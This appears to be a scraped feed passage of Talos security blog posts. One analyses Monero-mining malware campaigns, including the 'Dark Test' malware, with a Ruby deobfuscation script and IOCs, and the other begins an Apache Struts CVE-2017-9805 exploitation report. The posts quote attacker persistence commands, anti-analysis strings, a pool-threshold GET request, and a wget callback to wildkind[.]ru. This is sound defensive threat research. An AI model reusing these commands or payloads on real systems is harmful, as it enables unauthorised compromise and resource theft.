in the post we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue. \n \nIn one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero. \n\n\n[](<https://3.bp.blogspot.com/-MG_1-PGHnRc/WnG2S4DYdCI/AAAAAAAAAkQ/wm5t4BG-cyQT8H5R0SvXpiTP-vQ0i2CKQCLcBGAs/s1600/image21.png>)\n\n**Worker ID Statistics**\n\n \nIn a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software. \n\n\n[](<https://4.bp.blogspot.com/-M5-8y8Fx7Yo/WnG2YgVvaQI/AAAAAAAAAkU/ZVgb1EDHpsERm40rt653hTMYUH1Qvh51ACLcBGAs/s1600/image31.png>)\n\n**Historical Hash Rate**\n\n \nIn analyzing the size and scope of this campaign, we observed that shortly after these attacks began the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s. \n\n\n[](<https://3.bp.blogspot.com/-pjStDnu5oE8/WnG2d2dGbvI/AAAAAAAAAkY/Rxy4y24ajzQfDgPsl0EfQA9VeuZ5BDQegCLcBGAs/s1600/image11.png>)\n\n**Current Hash Rate**\n\n \nUsing an online calculator that takes hash rate, power consumption and cost then estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers. \n \nAnalyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884. \n\n\n[](<https://2.bp.blogspot.com/-cBKLUb4FJsY/WnG2jRgOLaI/AAAAAAAAAkc/vkIhD0cKfXUcw-bRIzTnENRE5fY7kDHTACLcBGAs/s1600/image5.png>)\n\n**Worker ID Payment History**\n\n \nWhile analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach. \n\n\n[](<https://3.bp.blogspot.com/-iFc7bTVYL4I/WnG3Ofd1fiI/AAAAAAAAAkw/OW1LuQqLbnYWaFFq3VVfkq-rxkwbhPc4ACLcBGAs/s1600/table.png>)\n\n**High Volume Calculations**\n\n \nOne additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year from $13 in January 2017 to over $300 at the time of this article and at times has approached $500. As long as the cryptocurrency craze continues and the value continues to increase, every piece of cryptocurrency mined increases in value which in turn increases the amount of revenue generated. That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting on to systems in the first place. \n \n\n\n## Threats Delivering Miners\n\n \nCryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and directly via exploitation. \n\n\n### Email Based\n\n \nThere are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. The way these infections typically work is that a user is sent an email with an attachment. These attachments typically have an archive containing a Word document that downloads the miner via a malicious macro or unpacks a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the binary that is included is a widely distributed Monero miner which is executed with the miscreants worker ID and pool, allowing attackers to reap the mining benefits. \n \nBelow is an example, from late 2017, of one of these campaigns. It's a job application spoof that includes a Word document purporting to be a resume of a potential candidate. \n\n\n[](<https://3.bp.blogspot.com/-HN1jDjRs9NA/WnG3ofsv07I/AAAAAAAAAk0/4X5qS3uMf18a-Kp7PAKUc-glbFynIHzSQCLcBGAs/s1600/image24.png>)\n\n**Example Malicious Email**\n\n \nAs you can see the email contains a word document which, when opened, looks like the following. \n\n\n[](<https://2.bp.blogspot.com/-YCNN3stnTLI/WnG3utpzHHI/AAAAAAAAAk4/cCbjw9yYuCgHf0Q5TZgqKlXA6OBCPxb_ACLcBGAs/s1600/image4.png>)\n\n**Example Word Document**\n\n \nAs is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used. \n \nThis image entices the user to enable macro content within the document that is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros using the Document_Open function: \n\n\n[](<https://4.bp.blogspot.com/-dyl8BOtHiUE/WnG303uF5iI/AAAAAAAAAk8/B-VcgP43bnU3nMYcTAfcxrp_IwAxif2ewCLcBGAs/s1600/image22.png>)\n\n**Highly Obfuscated VBA Macros Using Document_Open()**\n\n \n\n\nThe macro leads to a call to a Shell command: \n\n\n[](<https://1.bp.blogspot.com/-XOkkw3a6yUE/WnG4AVkCURI/AAAAAAAAAlA/VrDifm1A5oovDdn32WTa6HO76vUcmQJtQCLcBGAs/s1600/image32.png>)\n\n**Highly Obfuscated VBA Macro VBA.Shell Call**\n\n \nWe can see what is executed by this command after it is de-obfuscated by setting the first parameter into a MsgBox call: \n\n\n[](<https://2.bp.blogspot.com/--COaPZAv6Ew/WnG4LxL9dfI/AAAAAAAAAlE/GYytdgVpwOsm3yOL6Zh-z_UQAvlPFI6AQCLcBGAs/s1600/image30.png>)\n\n**MsgBox for Shell Replacement**\n\n \nThis will retrieve an executable remotely using System.Net.WebClient and execute it using Start-Process. This can also be seen through the dynamic activity in Threat Grid: \n\n\n[](<https://2.bp.blogspot.com/-mmTPAo0x4MQ/WnG4WK_-dTI/AAAAAAAAAlQ/J_DdWb9W-BsYAda0piFe3P56gM_gGVrTQCLcBGAs/s1600/image10.png>)\n\n**Office Document Launches a Powershell Indicator in Threat Grid**\n\n \nWe also identify that the downloaded binary is attempting to masquerade itself through its use of an image extension: \n\n\n[](<https://2.bp.blogspot.com/-YzD2ro54GK0/WnG5aJkJG5I/AAAAAAAAAlg/0ehj3iBDLigETrSyPdQvkcM7NJB5qr7OwCLcBGAs/s1600/image19.png>)\n\n**Portable Executable Image Extension Identification Threat Grid**\n\n \nIn this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner. This activity can be seen dynamically within Threat Grid: \n\n\n[](<https://3.bp.blogspot.com/-oAAn84JRp6M/WnG5k-T3a2I/AAAAAAAAAlk/RrVDgGKgj90yTIzm_Bap_fG6o9T89qdgwCLcBGAs/s1600/image20.png>)\n\n**xmrig Execution in Threat Grid**\n\n \nDynamic miner activity can also be observed within the AMP for Endpoints product line. An example below can be seen within the portal's Device Trajectory: \n\n\n[](<https://1.bp.blogspot.com/-AniIUgZrSrA/WnG5ui4mMwI/AAAAAAAAAlo/SgG7inliyH8OQPc9WLo_oug-1ct2g04dwCLcBGAs/s1600/image13.png>)\n\n**Dynamic Miner Execution in AMP for Endpoint's Device Trajectory**\n\n \nMining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments: \n\n\n[](<https://4.bp.blogspot.com/-TJimRD6275k/WnG53Hz4rCI/AAAAAAAAAls/8Ahjkqr-spA-ffuY1RQ0SWRpZ2dkQnDegCLcBGAs/s1600/image12.png>)\n\n**Mining Traffic Classification using Cognitive Threat Analytics**\n\n \n\n\n### Dark Test Cryptomining Malware\n\n \nDark Test (the name taken from the decompiled source code) is an example of Cryptomining malware written in C# that drops a UPX packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language) which can be decompiled back into source code. The C# code is highly obfuscated containing an encrypted resource section for all referenced strings, and functions that are resolved at runtime. The following section will discuss these techniques in detail. \n \n\n\n### Dark Test Obfuscation\n\n \nDark Test makes use of a packer which, after unpacking, creates a suspended version of itself using CreateProcessA and overwrites itself in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping from the address of lpBuffer buffer up to nSize. \n \nDark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations resulting in the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer: \n\n\n[](<https://2.bp.blogspot.com/-FW3xpQMFWTQ/WnG5_oHjZ7I/AAAAAAAAAlw/BiZn3XD0hlwNOu4QsRcNJPWt6FsOLshjwCLcBGAs/s1600/image29.png>)\n\n**Dynamic Method Resolution Using metadataToken Integer**\n\n \nFunctions are also indirectly called using the calli function which is passed a pointer to an entry point of a function and its accompanying parameters: \n\n\n[](<https://4.bp.blogspot.com/-BxKE4FUS_xo/WnG6HeOmbpI/AAAAAAAAAl0/iH44lM8q1Wo8CMZE61rxRgNrfLeUs_IeQCLcBGAs/s1600/image6.png>)\n\n**Runtime Resolved Function Calls using calli**\n\n \nThe decryption function takes three integer parameters. The first two make up the seek offset for the length and offset of the string to be decrypted, and the third is the XOR key for the string at this offset: \n\n\n[](<https://2.bp.blogspot.com/-5fAlSxHtsCs/WnG6PTD63ZI/AAAAAAAAAl8/WSBazviqxpMRnVke6nqudB0XZFWbrfDGgCLcBGAs/s1600/image27.png>)\n\n**Dark Test String Decryption Function**\n\n \nAt the calculated offset, the first four bytes is the offset of the ciphertext, and the next four is length of the string being decrypted. It then iterates for this length within an XOR for loop to decrypt the string at this offset. These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects: \n\n\n[](<https://3.bp.blogspot.com/-QHHC8NNpqhs/WnG6WuFY_3I/AAAAAAAAAmE/vyUgwV2z5egBm1veQbHpnJzX2_YsHa4agCLcBGAs/s1600/image17.png>)\n\n**Dark Test String Decryption Function Call**\n\n \nThe result, in this case, being the string \"-o pool.minexmr.com:4444 -u\" which is the domain and port combination for the mining pool the miner is participating in and the username parameter without a value. Although these strings are decrypted at runtime they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use): \n\n\n[](<https://3.bp.blogspot.com/-Bnn3A7ixXqo/WnG6dckoDWI/AAAAAAAAAmI/TmyF9F_Qr5Ms7ycfr9SXEoE4p9N68VaCgCLcBGAs/s1600/image2.png>)\n\n**Dynamic Miner Activity Command Line Arguments**\n\n \n\n\nRuntime resolved objects and functions make it difficult to extract all strings as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis due to different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal): [106, 242, 28] for each length. The result is that we can search for these bytes (being the first three of the length calculation) to find runtime calculated offsets. Once we know the length we can glean the ciphertext offset from the previous four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking for resulting valid ASCII ranges: \n\n \n \n #!/usr/bin/ruby \n \n fr = File.read(ARGV[0]) \n fb = fr.bytes \n \n for i in 0..fb.length-4 \n #Through their obfuscation technique we get an egg for obfuscated string lengths and offsets to find in the resource \n if fb[i] == 106 && fb[i+1] == 242 && fb[i+2] == 28 \n #Perform their arithmetic with provided bytes into an 32-bit int \n length = [fb[i-1], 106, 242, 28].pack(\"V*\").split(\"\\x00\").join.unpack(\"V\")[0] - 5 ^ 485648943 \n seek_offset_bytes = [fb[i-5], fb[i-4], fb[i-3], fb[i-2]] \n seek_offset = (seek_offset_bytes.pack(\"V*\").split(\"\\x00\").join.unpack(\"V\")[0] ^ 2100157544) - 100 \n puts \"Found length of: #{length}\" \n puts \"Seek offset bytes: #{seek_offset_bytes.inspect}\" \n ciphertext = [] \n for j in 0..length-1 \n ciphertext << fb[seek_offset+j] \n end \n if length > 2 \n for x in 0x00..0xFF \n finished = true \n result = [] \n for c in ciphertext \n unless((x ^ c).between?(0x20,0x7E)) \n finished = false \n break \n end \n result << (x ^ c) \n end \n if finished \n puts \"Found possible XOR key for string: #{result.pack(\"I*\").split(\"\\x00\").join} of length: #{length}\" \n end \n end \n end \n end \n end \n \n \n\nThis brute force approach provides some invalid results, however, also provides clear-text strings after manual review, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online to continue mining: \n\n \n \n /C net accounts /forcelogoff:no\n\nThis prevents forced logoffs from remote administrators. \n\n \n \n /C net accounts /maxpwage:unlimited\n\nThis sets the maximum password age to unlimited, which in turn prevents password expiry. \n\n \n \n /C powercfg /x /standby-timeout-ac 0\n\nThis will prevent the computer from entering standby mode, thus continuing mining operations when the computer is idle. \n\n \n \n /C reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f of length: 99\n\nThis will prevent the screensaver from starting. \n \nFurther, observed strings are those for anti-analysis: \n\n \n \n procexp \n PROCEXP \n pROCESShACKER \n ProcessHacker \n procexp64 \n Detect detector! \n Clear! \n taskmgr\n\n### Dark Test Network traffic\n\n \nTwo GET requests are sent to the api.ipfy.org used for public IP address identification. This is then followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URL locations of two executable files: bz.exe and cpu.zip \n\n\n[](<https://3.bp.blogspot.com/-Qc4_UEtvGbQ/WnG6t_zCEDI/AAAAAAAAAmU/Tbbi2yeKVKkhvIOmytvbMe3huDcz2cZJwCLcBGAs/s1600/image18.png>)\n\n**Dynamic Miner Activity Command Line Arguments**\n\n \nOddly enough this is not a valid .onion address, and is likely a placeholder from the server for this dropper, or a kiddie who set this up without replacing what the gateway was returning to the dropper on request. When searching for this pattern we came across a valid pastebin address containing a number of SQL commands for setting up a database with these domains with Russian comments: \n\n\n[](<https://1.bp.blogspot.com/-8Tjmvd6M01E/WnG61VY3rZI/AAAAAAAAAmc/jUfzdPmMu38oApQ9rKvbqIutNJdpdgttQCLcBGAs/s1600/image33.png>)\n\n**Pastebin SQL Commands**\n\n \nThis further implies the possibility of a builder or distributed gateway being used. Further searches turned up a number of in-the-wild filenames which correspond to wares: \n\n\n[](<https://3.bp.blogspot.com/-lPM4zO7Yy-I/WnG6-j_QqsI/AAAAAAAAAmg/eb6YMKLP9m02kqcHC39H5BowbycRyZLmgCLcBGAs/s1600/image15.png>)\n\n**Dark Test VirusTotal Observed in-the-wild Filenames**\n\n \nThis could indicate warez as being a possible distribution vector for this malware. \n \n\n\n### Dark Test Version 2\n\n \nThroughout the month of November, we started observing a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary but contained a statically linked version instead. Due to shared attributes with the first version of Dark Test we believe this is a new iteration written in Visual C++ rather than C#. The binary is shipped within an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and resumes the main thread. A notable difference is a more extensive list of anti-analysis strings which are searched for using Process32FirstW: \n\n\n[](<https://3.bp.blogspot.com/-yMVA8UyzTPM/WnG7LBRPlAI/AAAAAAAAAmk/F1xZeoz6HuQ9IfwbpwapLaZ_XfFKSbucgCLcBGAs/s1600/image14.png>)\n\n**Anti-Analysis Strings**\n\n \nAn interesting addition being vnc.exe to possibly detect VPS or analysis systems connected to using VNC. \n \n\n\n### Exploit Kit Based\n\n \nIn addition to the spam campaigns above Talos has also been observing RIG exploit kit delivering miners via smokeloader over the last couple months. The actual infection via the exploit kit is pretty standard for RIG activity. However, the great thing about mining is there are easily trackable elements left on the system, namely the 'Worker ID', as shown below: \n\n\n[](<https://4.bp.blogspot.com/-cRla5BFyQAo/WnG81bNNsbI/AAAAAAAAAm4/76tiUp0EMDIoF_TkhbSJyUWBXH02-upbACLcBGAs/s1600/image23.png>)\n\n**Command Line Syntax**\n\n \nUsing the Worker ID of: \n\n \n \n 43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD\n\nwe began digging into the amount of hashes this system is mining. What we found was a worker that was fluctuating between 25 KH/s and 60 KH/s. Taking the average at 42.5 KH/s, this actor was earning about $85/Day. \n \nThat may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years without being impacted without additional maintenance required by the actor. The only operational costs are associated with renting the exploit kit and associated infrastructure. Once victims are compromised, the activity continues for a cool $31,000 annually. \n \nHowever, when we started looking further back, this campaign has been ongoing off and on over the last six months with peak hash rates in excess of 100 KH/sec. \n\n\n[](<https://4.bp.blogspot.com/-S2jqc1PAgvQ/WnG9HDPM8zI/AAAAAAAAAm8/9BTHhW1hh2wYgMTCDMX4KXsFvaWSuElKQCLcBGAs/s1600/image16.png>)\n\n**Historical Hash Rate**\n\n \nThe campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid December. It's currently still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader. \n \n\n\n### Active Exploitation\n\n \nIn addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits, and most recently a Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and finally can result in significant financial gain. \n \nWhen you take threats being delivered to users via email and web as well as internet connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little bit deeper on the actual mining activity and the systems that have already been mining. \n \n\n\n## Deeper Dive on Mining and Workers\n\n \nOver the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain. \n \nOne thing that has been common with most of the malicious miners we found were the filename choices. Threat actors have chosen filenames that look harmless, such as \"Windows 7.exe\" and \"Windows 10.exe\". Additionally, Talos commonly saw \"taskmgrss.exe\", \"AdobeUpdater64.exe\", and \"svchost.exe\". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below. \n\n\n[](<https://3.bp.blogspot.com/-4AgsOM4lq_Y/WnG9YRuQ6vI/AAAAAAAAAnA/0uu00Q-7QMQueR7KPdE5qKzbn_p0K3p9gCLcBGAs/s1600/image28.png>)\n\n**Command Line Syntax**\n\n \nInterestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product [Immunet](<http://www.immunet.com/index>). \n \n\n\n## Mining as a Payload for the Future\n\n \nCryptocurrency miner payloads could be among some of the easiest money makers available for attackers. This is not to try and encourage the attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue for attackers. Attackers simply have to infect as many systems as possible, execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will be likely be just as happy computing 10KH/s as 500KH/s. If they have a specific hashrate goal, they can simply continue distributing miners to victims until they reach that goal. \n \nThe sheer volume of infected machines is how attackers can measure success with these campaigns. Since financial gain via mining is the mission objective there is no need to attempt to compromise hosts to steal documents, passwords, wallets, private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide secondary financial benefit or, in some cases, deliver the real malicious payload. In the later case ransomware can be used a smoke screen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more. \n \nSimply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However consider 100,000 systems and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software they already have their method of gains in the form of the control of system resources and the volume of hashes that can be generated by it. \n \nRecurring revenue is not just something a legitimate business strives for. Malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks and rarely is this type of malware used to attack 100,000s of users. As such a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers attackers have created an entire solution specifically designed to do one thing: generate recurring revenue. \n \nContinuing use of cryptominers as a payload and ensuring the system is running at full capacity will continue to evolve. Talos has observed attacks where the attacker has cleaned up the machine by removing other miners before then infecting the user and installing their own mining software. Attackers are already fighting for these resources as the potential monetary value and ongoing revenue stream is massive. \n \n\n\n## Are Miners Malware?\n\n \nMining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines. Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, perform and validate transactions and reward miners performing the complex mathematical calculations to ensure the integrity and security of the cryptocurrency ecosystem & network. \n \nIf a legitimate user runs the mining software locally they can run their own mining platform; likewise a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that they are performing this task intentionally. The malicious actor is performing this task, in the exact same manner as the legitimate user, but without the user's knowledge or consent. The difference is the deception that occurs for the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the malicious arsenal the attacker chooses to use, but, much like when Powershell or PSExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that is important. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and are having their computational resources abused to generate revenue for the actors. \n \n\n\n## Enterprise Impacts\n\n \nRegardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments. \n \nThis is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, it is wasted or stolen resources for an organization and depending on the configuration of these systems, it could have larger impacts. Obviously if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin. \n \nDue to the large amount of willing users, it might warrant an organization crafting a policy or adding a section to existing policy regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these file should be treated as malware, and removed/quarantined as such. \n \n\n\n## Fails we Found\n\n \nWhile investigating malware campaigns that were distributing Monero mining software we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below: \n\n\n[](<https://4.bp.blogspot.com/-gYfSx4Z3fR4/WnG9hB4ZaOI/AAAAAAAAAnE/EK10eb8tztI0t8vU5UKISuX3zSzLIVjPgCLcBGAs/s1600/image9.png>)\n\n**Command Line Syntax**\n\n \nInterestingly, the userpass parameter that is used to register the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software source code as released on GitHub. The attacker didn't bother to change it, resulting in all of the machines infected mining Monero which was being sent to the mining application's author - not the attacker themselves. \n\n\n[](<https://4.bp.blogspot.com/-Serv6ugXd5s/WnG9qlxt1GI/AAAAAAAAAnI/BQeRNxdbKKkQ3aOYZ2aZrGQFwAa74aOOgCLcBGAs/s1600/image34.png>)\n\n**Source Code Default Values**\n\n \nIn several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners. A few examples are below: \n\n\n[](<https://2.bp.blogspot.com/--VxrS9BeGXA/WnG9ydG0RlI/AAAAAAAAAnM/j_rDz4bvK384-fHed56GXcDehQ9P-Dt_QCLcBGAs/s1600/image25.png>)\n\n**Mining Fail Example #1**\n\n[](<https://3.bp.blogspot.com/-w3Y6QyEIEP8/WnG96btX1wI/AAAAAAAAAnU/5jijQ_mBw6Q89KlaCgw506k5Ef2rNwBgwCLcBGAs/s1600/image8.png>)\n\n**Mining Fail Example #2**\n\n[](<https://1.bp.blogspot.com/-lzwj4E9U-0o/WnG-Cc7XTYI/AAAAAAAAAnY/MSP3Pngrk0AtEgq5ceto9lyo6cdNFF9lQCLcBGAs/s1600/image3.png>)\n\n**Mining Fail Example #3**\n\n[](<https://2.bp.blogspot.com/-boqhpLlFsxw/WnG-JhPkK6I/AAAAAAAAAnc/pZdDYcGpxw4B6pFIf6tV65MtkC9f9-7zACLcBGAs/s1600/image1.png>)\n\n**Mining Fail Example #4**\n\n \nThis clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always being updated to enable them to monetize or generate revenue from these sorts of attacks. \n \nAdditionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a \"Personal Threshold\" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR) the attacker would have to wait an extended period before receiving their next payout. While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request as long as the request is made to the mining pool's URL using the following structure: \n \n\n \n \n \"https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000\"\n\n \nWhere $WORKER is the 'Worker ID' that is being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could be different depending on the pool that is being used by the adversary. \n \n\n\n## Conclusion\n\n \nThe number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected. \n \nCrypto miners may well be the new payload of choice for adversaries. It has been and will always be about money and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money for each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system other than some occasional slow down. This increases the time a system is infected and generating revenue. In many ways its the exact opposite of ransomware. Ransomware is designed to generate revenue in a couple of days from a victim and the payoff is immediate. Malicious miners are designed to exist on a system for weeks, months, or ideally years. \n \nIt also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment and then deciding how to handle it going forward. \n \n\n\n## Coverage\n\n \nThere are different ways to address miners and there is detection built in to Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally there are a couple NGIPS signatures designed to detect mining activity as well. However, these rules may not be enabled by default in your environment depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity includes, but isn't limited to: 40841-40842, 45417, and 45548-45550. \n \nAlso, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted. \n \n\n\n## IOC Section\n\n \n\n\n### IP Addresses:\n\n \n89.248.169[.]136 \n128.199.86[.]57 \n\n\n### \n\n### Domains:\n\n \nqyvtls749tio[.]com \nyouronionlink[.]onion \n \n\n\n### [File Hashes](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5a71e1c64654d.txt>)\n\n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=nyH5a-BdwkQ:qkNEPRJJDb0:yIl2AUoC8zA>)\n\n", "cvss3": {}, "published": "2018-01-31T07:58:00", "type": "talosblog", "title": "Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-3506"], "modified": "2018-01-31T16:34:16", "id": "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nyH5a-BdwkQ/malicious-xmr-mining.html", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-08T17:15:47", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string></blockquote>This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string></blockquote>During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" 